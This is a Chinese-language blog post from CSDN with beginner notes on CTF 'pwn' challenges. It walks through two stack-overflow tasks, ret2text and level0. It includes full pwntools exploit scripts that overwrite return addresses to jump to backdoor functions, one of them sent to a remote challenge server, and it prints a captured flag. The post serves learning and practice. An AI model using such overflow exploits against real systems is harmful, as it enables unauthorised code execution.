pwn简单学习

最新推荐文章于 2023-10-08 19:57:39 发布
最新推荐文章于 2023-10-08 19:57:39 发布
阅读量294 收藏
点赞数
分类专栏: 笔记 pwn 文章标签: python c语言 c++
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_51974791/article/details/118718839
版权
笔记 同时被 2 个专栏收录
25 篇文章 0 订阅
订阅专栏
pwn
2 篇文章 0 订阅
订阅专栏

最简单的栈溢出

ret2text题目为例

  • 篡改栈帧上的返回地址为程序中已经有的后门函数
    首先用cheksec查一下文件的一些基本信息:
    在这里插入图片描述
    是一个32位的文件,NX enabled开启就是意味着栈中数据没有执行权限。
    拿IDA看一下函数:
    在这里插入图片描述
    vulnerable()显然是一个有问题的函数跟进去
    在这里插入图片描述
    这里使用了gets指令来读入数据,buffer[8]很明显,向gets读大于8的数据就会溢出。
    在这里插入图片描述
    还发现该程序留有后门在程序中:
    在这里插入图片描述
    思路很明确了,要返回到get_shell这个函数就能获得交互界面。现在只需要确定buffer在栈中的位置,通过溢出数据覆盖返回地址到get_shell。
    在main函数下断点向下执行,进入vulnerable()函数:
    在这里插入图片描述
    就输入8位字符试一试,可以看到,我们写入数据的缓冲区与ebp的距离为0x10
    在这里插入图片描述
    也就是写入16个字符就可以覆盖掉ebp,再继续写4个字节就可以覆盖掉下面的返回地址。
    get_shell函数的地址可以看到为:在这里插入图片描述
    然后就可以写出payload
payload = b'A'*16+b'BBBB'+p32(0x8048522)

因为这一题没法连上,所以直接在本地搞一搞。
在这里插入图片描述
payload:

from pwn import *

io = process("./ret2text")
payload = b'A'*16+b'BBBB'+ p32(0x8048522)
io.send(payload)
io.interactive()

在这里插入图片描述

紧接着做一道攻防世界的level0

在这里插入图片描述
首先查一下文件:跟上面的一样,只不过这次是64位的文件,有NX保护。
在这里插入图片描述
载入IDA看一看:
在这里插入图片描述
在这里插入图片描述
同样发现了callsystem函数,还是同样的思路,溢出的数据覆盖返回值到callsystem()就可以控制场景。
看一看buf在栈中的位置:
在这里插入图片描述
可以看到宽度为:0x80,再写入8位就可以覆盖返回值,加上callsystem()的地址就可以完成操作。
callsystem()地址:
在这里插入图片描述
所以payload为:

from pwn import*
io = remote("111.200.241.244",58807)
payload = b'A'*0x80+b'A'*8+p64(0x0000000000400596)
io.send(payload)
io.interactive()

在这里插入图片描述

cyberpeace{2847076e77a1fa64e7a9bde52b741994}

Sw@9
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
PWN基础之函数调用栈和栈溢出
weixin_46132162的博客
12-28 1342
在函数调用结束时,栈顶的函数(callee)状态被弹出,栈顶恢复到调用函数(caller)的状态函数调用栈在内存从高地址向低地址生长,所以栈顶对应的内存地址在压栈时变小,退栈时变大。接下来vulnerable_function()函数会调用read()函数,这个时候vulnerable_function()函数为主调函数(caller function)read()函数为被调函数(callee function)read()函数 是有参数的,我们来看一看有参数的函数在函数调用栈是什么样的。
【Web狗自虐系列1】Pwn入门之初级ROP
就这样吧
07-06 878
栈式一种典型的后进先出的数据结构,其操作主要有压栈(push)与出栈(pop)两种操作压栈与出栈都是操作的栈顶高级语言在运行时都会被转换为汇编程序,在汇编程序运行过程,充分利用了这一数据结构。每个程序在运行时都有虚拟地址空间,其某一部分就是该程序对应的栈,用于保存函数调用信息和局部变量。程序的栈是从进程地址空间的高地址向低地址增长的。
CTF PWN基础知识(寄存器、栈、汇编指令、标志位)详解
weixin_43780092的博客
09-04 4982
本文详解PWN基础知识,文寄存器缩写都有标注上文含义,方便初学者理解记忆。
CTF学习笔记——PWN(入门)
weixin_66578482的博客
10-08 1922
🚀🚀这篇笔记是我对自己初步学习CTF的一个小总结,主要涉及了PWN板块的入门题型,比如栈溢出等,这部分内容比较简单,算是对PWN形成一个简单的概念,来帮助我们进行后面的学习,本文没有很多基础知识的介绍,主要集在题目的总结,所以此篇笔记主要起到一个分析总结的作用。CTF学习笔记——PWN(入门) PWN基础概念 NC题 [HGAME 2023 week1]test_nc 栈溢出 [HNCTF 2022 Week1]easyoverflow 伪随机数 [SWPUCTF 2022 新生赛]Darling
CTF-PWN学习-为缺少指导的同学而生
yuwoxinanA3的博客
05-11 1万+
入门PWN不可能无痛,但尽量会减轻大家的痛苦,怎么说呢,就像博主在你们前面一步的位置,帮你们挡着一点风浪前进。
pwn学习历程.pdf
09-30
pwn学习修炼之旅,内部包含各个模块各个知识点,有助于爱好者有方向的学习前进,加油,很好的资料哦,很有意义。
Pwn学习路线及学习笔记以及gem安装
10-15
Pwn学习路线及学习笔记
pwn入门学习-附件资源
03-05
pwn入门学习-附件资源
pwn学习资料整理——ROP技术(pwn_rop1)
08-30
pwn学习资料整理——ROP技术(pwn_rop1)
pwn学习入门详解PPT
04-17
包括Windows内核学习,格式化字符串,栈溢出等方面
一道pwn入门的练习题
10-23
直接以一个非常简单的栈溢出例子(基于Linux)来讲解pwn所要用到的一些常用的工具及命令的用例
一个简单的例子入门pwn
钞sir的博客
10-23 1万+
首先,pwn大概是pwn to own的意思,就是通过二进制/系统调用等方式获得目标主机的shell; 我直接以一个非常简单的栈溢出例子(基于Linux)来讲解pwn所要用到的一些常用的工具及命令; 所需要的工具安装等,可以先看这个链接(https://blog.csdn.net/qq_40827990/article/details/83217716) 例子下载地址:https://d...
PWN入门系列教程~(1)
小心信科理化声
11-30 7254
PWN入门系列教程~(1)前言关于我的故事先来说下学习路线大致分为以下几个部分那么什么是PWN呢?栈函数调用栈寄存器函数调用栈的经典内存布局 前言 关于我的故事 博主是一名20级在校大学生,平常热爱网络安全。喜欢打CTF,但是自己所在的学校里并没有人去担任PWN的工作,身为会长的我自来要挑起重担了,在跟几位有联系的PWN佬交流后明确了自己的要学pwn。 先来说下学习路线 大致分为以下几个部分 学习基础:去学习一些基本的原理 学习真实漏洞 编写exp FUZZ 那么什么是PWN呢? 来说下pwn的来源:
pwn零基础入门
weixin_45948183的博客
03-24 1万+
pwn零基础入门 很多初学者在初学pwn的时候,对pwn可能存在许多疑问,学什么,怎么学,今天和大家分享一下刚学pwn的一些资料的学习历程。 首先分享一下pwn的一系列学习资料 一、首先语言基础得打牢,1、汇编语言,《汇编语言—王爽》2、编程语言(C语言pythonC语言必须要会,题目大部分是用C语言写的,而且很多那些知识都要读libc的源代码。会python,exp用python写的,CTF...
PWN入门(一)
lulu001128的博客
04-24 2797
知识
Pwn入门基础
热门推荐
m0_49666584的博客
09-28 1万+
pwn主要是指通过程序本身的漏洞,编写利用脚本破解程序拿到系统的权限,这就要求我们对程序的各种函数,内存地址,堆栈空间,文件的结构有足够的了解。 0x01知识储备 c语言 python 汇编语言基础指令 Linux操作系统基本使用方法 c语言是当前比赛pwn项目最常用的语言,IDA pro反汇编后得到的也是c语言的伪代码,所以c语言的熟练掌握会对程序的分析有很大帮助。 python主要用于编写exp(攻击)脚本,另外python有一个pwntools的pyth...
[pwn]汇编基础笔记(2020年9月26日更新)
CSDN_orangeP
09-26 322
寄存器 32位通用寄存器: EAX EBX ECX EDX EBP ESP ESI EDI EAX:扩展累加器,乘除指令默认使用 ECX:cpu默认使用ECX为循环计数器 EBP:扩展基址指针寄存器(extended base pointer) 其内存放着一个指向系统栈最上面一个栈帧底部的指针。用于引用函数参数和局部变量。 ESP:栈指针寄存器(extended stack pointer),其内存放着一个指向系统栈最上面一个栈帧栈顶的指针。32位模式下,ESP寄存器存放的是某个位置的32位偏移量。ESP
一道简单的入门pwn
m1785717的博客
09-07 9662
这是一道入门的pwn题 链接:https://pan.baidu.com/s/1vltSv8tJYrqKw8vATxwNYA 密码:f0qy 拿到题先用file命令查看一下文件信息 可以看到是32-bit 的elf文件,用32位的IDA打开。 首先进入main函数,F5反编译后分析代码 定位到输入的参数&s,可以看到参数s分配的空间。这一题通过覆盖的方式执行_system...
BUUCTF pwn rip
最新发布
01-28
根据提供的引用内容,BUUCTF PWN-RIP是一个关于PWN技术的详解文章。文章提到了64位的EIF文件rbp寄存器的大小为8个字节。如果对这部分不太理解,可以阅读作者的另一篇关于PWN基础知识的文章。 BUUCTF PWN-RIP详解主要讲解了如何利用RIP寄存器来进行PWN攻击。RIP寄存器是存储下一条指令的地址,通过控制RIP寄存器的值,可以改变程序的执行流程,从而实现攻击的目的。 PWN攻击是一种利用软件漏洞来获取对计算机系统的控制权的攻击方式。在PWN攻击,攻击者通常会利用程序的漏洞,通过输入特定的数据来改变程序的执行流程,从而实现攻击的目的。 BUUCTF PWN-RIP详解文章提供了一些示例和技巧,帮助读者理解和掌握PWN攻击利用RIP寄存器的方法。如果你对PWN攻击感兴趣,可以阅读该文章以获取更多详细信息。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值